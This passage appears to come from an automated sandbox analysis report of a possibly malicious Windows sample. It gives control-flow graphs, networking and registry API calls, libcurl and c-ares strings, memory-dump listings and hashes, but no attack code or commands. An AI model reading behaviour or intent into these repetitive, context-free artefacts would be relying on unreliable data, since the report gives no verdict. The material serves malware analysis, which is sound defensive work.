8a2e30-8a2e35 1330->1333 1334 8a2e37 1330->1334 1331->1332 1341 8a2d65-8a2d7d call c28da0 1331->1341 1332->1319 1335 8a2e3c-8a2ed6 call d29c50 call d29ce0 1333->1335 1334->1335 1350 8a2eea 1335->1350 1351 8a2ed8-8a2ee1 1335->1351 1341->1332 1346 8a2d7f-8a2d97 call c28da0 1341->1346 1346->1332 1352 8a2daf-8a2dc9 call c28e68 1346->1352 1354 8a2eef-8a2f16 call d29c50 call d29ce0 1350->1354 1351->1350 1353 8a2ee3-8a2ee8 1351->1353 1352->1319 1352->1320 1353->1354
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                            • String ID: 0
                                            • API String ID: 2406880114-4108050209
                                            • Opcode ID: 8bdb39e4707dda8d1bf91fc7f68dc9936b17e4703a011ba68f71b61420a337e7
                                            • Instruction ID: d44eaa0a99dfe4adef319964407bfc44802d38f692e43061f5d8003d8a4d8848
                                            • Opcode Fuzzy Hash: 8bdb39e4707dda8d1bf91fc7f68dc9936b17e4703a011ba68f71b61420a337e7
                                            • Instruction Fuzzy Hash: 12E106B49053199FDB10EF68D98569DBBF4FF88304F008869E898E7350E7749988DF92
                                            Function 008B05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1541 8b05b0-8b05b7 1542 8b07ee 1541->1542 1543 8b05bd-8b05d4 1541->1543 1544 8b05da-8b05e6 1543->1544 1545 8b07e7-8b07ed 1543->1545 1544->1545 1546 8b05ec-8b05f0 1544->1546 1545->1542 1547 8b07c7-8b07cc 1546->1547 1548 8b05f6-8b0620 call 8b7350 call 8a70b0 1546->1548 1547->1545 1553 8b066a-8b068c call 8ddec0 1548->1553 1554 8b0622-8b0624 1548->1554 1559 8b0692-8b06a0 1553->1559 1560 8b07d6-8b07e3 call 8b7380 1553->1560 1556 8b0630-8b0655 call 8a70d0 call 8b03c0 call 8b7450 1554->1556 1585 8b065b-8b0668 call 8a70e0 1556->1585 1586 8b07ce 1556->1586 1562 8b06a2-8b06a4 1559->1562 1563 8b06f4-8b06f6 1559->1563 1560->1545 1566 8b06b0-8b06e4 call 8b73b0 1562->1566 1568 8b07ef-8b082b call 8b3000 1563->1568 1569 8b06fc-8b06fe 1563->1569 1566->1560 1584 8b06ea-8b06ee 1566->1584 1582 8b0a2f-8b0a35 1568->1582 1583 8b0831-8b0837 1568->1583 1574 8b072c-8b0754 1569->1574 1575 8b075f-8b078b 1574->1575 1576 8b0756-8b075b 1574->1576 1596 8b0791-8b0796 1575->1596 1597 8b0700-8b0703 1575->1597 1580 8b075d 1576->1580 1581 8b0707-8b0719 WSAEventSelect 1576->1581 1587 8b0723-8b0726 1580->1587 1581->1560 1594 8b071f 1581->1594 1592 8b0a3c-8b0a52 1582->1592 1593 8b0a37-8b0a3a 1582->1593 1589 8b0839-8b0842 call 8b6fa0 1583->1589 1590 8b0861-8b087e 1583->1590 1584->1566 1591 8b06f0 1584->1591 1585->1553 1585->1556 1586->1560 1587->1568 1587->1574 1602 8b0847-8b084c 1589->1602 1608 8b0882-8b088d 1590->1608 1591->1563 1592->1560 1599 8b0a58-8b0a81 call 8b2f10 1592->1599 1593->1592 1594->1587 1596->1597 1601 8b079c-8b07c2 call 8a76a0 1596->1601 1597->1581 1599->1560 1610 8b0a87-8b0a97 call 8b6df0 1599->1610 1601->1597 1606 8b0a9c-8b0aa4 1602->1606 1607 8b0852 1602->1607 1606->1560 1607->1590 1612 8b0854-8b085f 1607->1612 1613 8b0893-8b08b1 1608->1613 1614 8b0970-8b0975 1608->1614 1610->1560 1612->1608 1618 8b08c8-8b08f7 1613->1618 1616 8b097b-8b0989 call 8a70b0 1614->1616 1617 8b0a19-8b0a2c 1614->1617 1616->1617 1626 8b098f-8b099e 1616->1626 1617->1582 1624 8b08f9-8b08fb 1618->1624 1625 8b08fd-8b0925 1618->1625 1627 8b0928-8b093f 1624->1627 1625->1627 1628 8b09b0-8b09c1 call 8a70d0 1626->1628 1634 8b08b3-8b08c2 1627->1634 1635 8b0945-8b096b 1627->1635 1632 8b09c3-8b09c7 1628->1632 1633 8b09a0-8b09ae call 8a70e0 1628->1633 1636 8b09e8-8b0a03 WSAEnumNetworkEvents 1632->1636 1633->1617 1633->1628 1634->1614 1634->1618 1635->1634 1638 8b09d0-8b09e6 WSAEventSelect 1636->1638 1639 8b0a05-8b0a17 1636->1639 1638->1633 1638->1636 1639->1638
                                            APIs
                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 008B0712
                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008B09DC
                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008B09FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: EventSelect$EnumEventsNetwork
                                            • String ID: multi.c
                                            • API String ID: 2170980988-214371023
                                            • Opcode ID: 7815692710386805476925a7aa6a26a97f4be53a84aa2b6d223990151be8f1c7
                                            • Instruction ID: aec676f38ec0f3a867ea96b0885ea7c7a7195b8ba6dda7497f6e030d8c0bcf42
                                            • Opcode Fuzzy Hash: 7815692710386805476925a7aa6a26a97f4be53a84aa2b6d223990151be8f1c7
                                            • Instruction Fuzzy Hash: 7BD19A756083059BE710CE24C881BABBBE9FB94348F04882CF985C6352EB75E959DB52
                                            Function 0096B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1779 96b180-96b195 1780 96b3e0-96b3e7 1779->1780 1781 96b19b-96b1a2 1779->1781 1782 96b1b0-96b1b9 1781->1782 1782->1782 1783 96b1bb-96b1bd 1782->1783 1783->1780 1784 96b1c3-96b1d0 1783->1784 1786 96b1d6-96b1f2 1784->1786 1787 96b3db 1784->1787 1788 96b229-96b22d 1786->1788 1787->1780 1789 96b233-96b246 1788->1789 1790 96b3e8-96b417 1788->1790 1791 96b260-96b264 1789->1791 1792 96b248-96b24b 1789->1792 1798 96b582-96b589 1790->1798 1799 96b41d-96b429 1790->1799 1796 96b269-96b286 call 96af30 1791->1796 1793 96b215-96b223 1792->1793 1794 96b24d-96b256 1792->1794 1793->1788 1797 96b315-96b33c call c28b00 1793->1797 1794->1796 1805 96b2f0-96b301 1796->1805 1806 96b288-96b2a3 call 96b060 1796->1806 1813 96b342-96b347 1797->1813 1814 96b3bf-96b3ca 1797->1814 1802 96b435-96b44c call 96b590 1799->1802 1803 96b42b-96b433 call 96b590 1799->1803 1816 96b44e-96b456 call 96b590 1802->1816 1817 96b458-96b471 call 96b590 1802->1817 1803->1802 1805->1793 1828 96b307-96b310 1805->1828 1824 96b200-96b213 call 96b020 1806->1824 1825 96b2a9-96b2c7 getsockname call 96b020 1806->1825 1820 96b384-96b38f 1813->1820 1821 96b349-96b358 1813->1821 1818 96b3cc-96b3d9 1814->1818 1816->1817 1837 96b473-96b487 1817->1837 1838 96b48c-96b4a7 1817->1838 1818->1780 1820->1814 1823 96b391-96b3a5 1820->1823 1822 96b360-96b382 1821->1822 1822->1820 1822->1822 1829 96b3b0-96b3bd 1823->1829 1824->1793 1835 96b2cc-96b2dd 1825->1835 1828->1818 1829->1814 1829->1829 1835->1793 1839 96b2e3 1835->1839 1837->1798 1840 96b4b3-96b4cb call 96b660 1838->1840 1841 96b4a9-96b4b1 call 96b660 1838->1841 1839->1828 1846 96b4cd-96b4d5 call 96b660 1840->1846 1847 96b4d9-96b4f5 call 96b660 1840->1847 1841->1840 1846->1847 1852 96b4f7-96b50b 1847->1852 1853 96b50d-96b52b call 96b770 * 2 1847->1853 1852->1798 1853->1798 1858 96b52d-96b531 1853->1858 1859 96b533-96b53b 1858->1859 1860 96b580 1858->1860 1861 96b53d-96b547 1859->1861 1862 96b578-96b57e 1859->1862 1860->1798 1861->1862 1863 96b549-96b54d 1861->1863 1862->1798 1863->1862 1864 96b54f-96b558 1863->1864 1864->1862 1865 96b55a-96b576 call 96b870 * 2 1864->1865 1865->1798 1865->1862
                                            APIs
                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0096B2B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                            • API String ID: 3358416759-2430778319
                                            • Opcode ID: 659e0b6aa08784adbee655cb1cf40024b673b5218d430cce02cd771fe1ee9878
                                            • Instruction ID: f4c54d2642c0143aada58ab184926f04780f879cb52ad3e9621a4892a6009109
                                            • Opcode Fuzzy Hash: 659e0b6aa08784adbee655cb1cf40024b673b5218d430cce02cd771fe1ee9878
                                            • Instruction Fuzzy Hash: F6C18C716053159FD718DF24C890A6AB7E5AF88314F04896DF84ACB3A2EB35ED85CB81
                                            Function 008B6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f0c6ea39695c717c948332fdc77d606a3831491eac4962d8730f3ac4ce8e5c9
                                            • Instruction ID: 17c54437d33f2c850b196001944610c51ffac3e838ed3a9aee729305f0905de3
                                            • Opcode Fuzzy Hash: 1f0c6ea39695c717c948332fdc77d606a3831491eac4962d8730f3ac4ce8e5c9
                                            • Instruction Fuzzy Hash: D091EF3060D74A8BD7359A2888D47FBB2D9FBC4324F148B2CE899863D4EB75AC419691
                                            Function 008A1160 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 9c4a071416d1cf377385867911fefd3c3077d3a461cf1a1c2c7b9aafc5c384f8
                                            • Instruction ID: 85b88a332b21ed13547533cf11587bc8f0fe6a45d668d434fd6100782f61592a
                                            • Opcode Fuzzy Hash: 9c4a071416d1cf377385867911fefd3c3077d3a461cf1a1c2c7b9aafc5c384f8
                                            • Instruction Fuzzy Hash: A581BFB19053188FEF10DF64E88836EBBE1FB46704F10482DD989CBB51D7759988EB92
                                            Function 008A11A3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 2d7b3ef7f464e9f3800c2b66988d928946bbfc22586b291f2fb1bddd2836da72
                                            • Instruction ID: b105e9d5b5e67eaee75610698a99b7036ee83481197661713b56ae7519eca2a2
                                            • Opcode Fuzzy Hash: 2d7b3ef7f464e9f3800c2b66988d928946bbfc22586b291f2fb1bddd2836da72
                                            • Instruction Fuzzy Hash: 58414BB0A053198FEB10EF68E88475DBBF0FB49704F14442DD989DB750D7749984EB52
                                            Function 008A13C9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 0d840b5c5e16b5d03cfe4077dd701f6b1b5190c47b0ec62fa8ed999012efdb1a
                                            • Instruction ID: e75dbd404dfcbf8e2fc6c165bb1c225762bd840c93a8d25ec4fffd99fcd5fb71
                                            • Opcode Fuzzy Hash: 0d840b5c5e16b5d03cfe4077dd701f6b1b5190c47b0ec62fa8ed999012efdb1a
                                            • Instruction Fuzzy Hash: 6B4105B0A053198FEB10EF64E98435EBBE0FB49704F10482DD9899B751DB74A988EB52
                                            Function 0096A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            APIs
                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0095712E,?,?,?,00001001,00000000), ref: 0096A90D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: recvfrom
                                            • String ID:
                                            • API String ID: 846543921-0
                                            • Opcode ID: fb492b06f231f4e9290bb7d4086cc0e14998851b3e0f7b6f428b3b9b97fb01db
                                            • Instruction ID: 44ed89f6570c4f70347c0a6240d674630d113b14e01b06b3620d1dd8dacb2d22
                                            • Opcode Fuzzy Hash: fb492b06f231f4e9290bb7d4086cc0e14998851b3e0f7b6f428b3b9b97fb01db
                                            • Instruction Fuzzy Hash: 3CF06D75108308AFD2109F11DC88D6BBBEDEFC9794F05495DF948232118270AE10CEB2
                                            Function 0095A440 Relevance: 51.8, APIs: 19, Strings: 10, Instructions: 1066registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0095AA19
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0095AA4C
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0095AA97
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0095AAE9
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0095AB30
                                            • RegCloseKey.KERNELBASE(?), ref: 0095AB6A
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0095AB82
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0095AC46
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0095AD0A
                                            • RegEnumKeyExA.KERNELBASE ref: 0095AD8D
                                            • RegCloseKey.KERNELBASE(?), ref: 0095ADD9
                                            • RegEnumKeyExA.KERNELBASE ref: 0095AE08
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0095AE2A
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0095AE54
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0095AF63
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0095AFB2
                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0095B072
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
